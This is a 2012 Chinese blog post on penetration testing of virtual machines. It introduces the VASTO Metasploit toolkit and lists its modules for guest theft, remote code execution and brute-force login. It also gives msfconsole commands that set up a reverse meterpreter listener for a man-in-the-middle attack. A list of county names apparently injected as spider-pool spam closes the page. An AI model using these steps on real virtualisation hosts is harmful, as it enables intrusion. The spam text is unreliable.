qileilove

          blog已經轉移至github,大家請訪問 http://qaseven.github.io/

          針對虛擬機的滲透測試

          如今虛擬化在各個企業中應用的越來越多,且火熱的云計算也依托于此技術。虛擬化技術確實能夠使物理資源的利用更加靈活和便捷,那么虛擬機的安全性如何?相比傳統架構,是否像傳說中的一樣安全?

            什么是虛擬化

            虛擬化是指計算機元件在虛擬的基礎上而不是真實的基礎上運行。虛擬化技術可以擴大硬件的容量,簡化軟件的重新配置過程。CPU的虛擬化技術可以單CPU模擬多CPU并行,允許一個平臺同時運行多個操作系統,并且應用程序都可以在相互獨立的空間內運行而互不影響,從而顯著提高計算機的工作效率。我們先來看看虛擬機的層次結構圖。

            虛擬機完全獨立于其底層物理硬件。 例如,你可以為虛擬機配置與底層硬件上存在的物理組件完全不同的虛擬組件(例如,CPU、網卡、SCSI 控制器)。 同一物理服務器上的各個虛擬機甚至可以運行不同類型的操作系統(WindowsLinux 等)

            針對虛擬機的滲透測試

            VASTO是一個專用的虛擬機滲透測試工具,支持VMware, Oracle和Xen,可以與神器Metasploit有很好的結合。使用前需要先解壓,然后復制metasploit文件夾下中

            VASTO的主要模塊如下,功能還是比較強大的

            abiquo_guest_stealer – Abiquo guest stealer
            abiquo_poison – Abiquo poison
            eucalyptus_bouncer – Eucalyptus Bouncer
            eucalyptus_poison – Eucalyptus Poison
            oraclevm_oravma_fileread – Oracle VM agent remote code execution
            vmware_autopwner – VMautopwn
            vmware_guest_stealer – VMware Guest Stealer
            vmware_login – VMware Login check scanner
            vmware_session_rider – VMware Session Rider
            vmware_studio_upload – VMware Studio<2.0.0.946-172280 Remote Code Execution
            vmware_updatemanager_traversal – Update manager path traversal
            vmware_version – VMware products fingerprintervmware_vilurker – VIlurker VIclient attack
            vmware_webaccess_portscan – VMware Web Access Relay Port Scanner
            xen_login – Xen Login Check Scanner
            oracle_oravma_exec – Oracle VM agent remote code execution
            vmware_sfcbd_exec - VMware VAMI-sfcbd remote code exec
            vmware_tomcat_killer – VMware tomcat killer
            Versionsscanner Modul:

            用于判斷VM的版本等信息



           Login Scanner Modul:

            這個模塊可以使用字典嘗試暴力登錄虛擬機

            vilurker module

            這個模塊原理即利用ettercap等進行中間人攻擊,欺騙成功后,當被攻擊者(client)訪問server時會彈出窗體,若點擊即反彈一個meterpreter。

            先multi/handler監聽

            msf > use multi/handler
            msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
            msf exploit(handler) > set LHOST <Local Host IP here>
            msf exploit(handler) > exploit

            欺騙過程如下

            返回shell(meterpreter)

          posted on 2012-12-19 12:14 順其自然EVO 閱讀(554) 評論(0)  編輯  收藏 所屬分類: 測試學習專欄

          <2012年12月>
          2526272829301
          2345678
          9101112131415
          16171819202122
          23242526272829
          303112345

          導航

          統計

          常用鏈接

          留言簿(55)

          隨筆分類

          隨筆檔案

          文章分類

          文章檔案

          搜索

          最新評論

          閱讀排行榜

          評論排行榜

          主站蜘蛛池模板: 灵石县| 桑日县| 马山县| 通城县| 逊克县| 玛沁县| 什邡市| 天柱县| 武平县| 波密县| 曲阜市| 乡城县| 含山县| 双流县| 宝兴县| 久治县| 赫章县| 巫山县| 清镇市| 文登市| 抚州市| 同江市| 盱眙县| 黄骅市| 通江县| 静安区| 金山区| 汉中市| 林口县| 闻喜县| 宜都市| 巴马| 双鸭山市| 陇西县| 闽清县| 同心县| 乐陵市| 南城县| 公安县| 新龙县| 渭源县|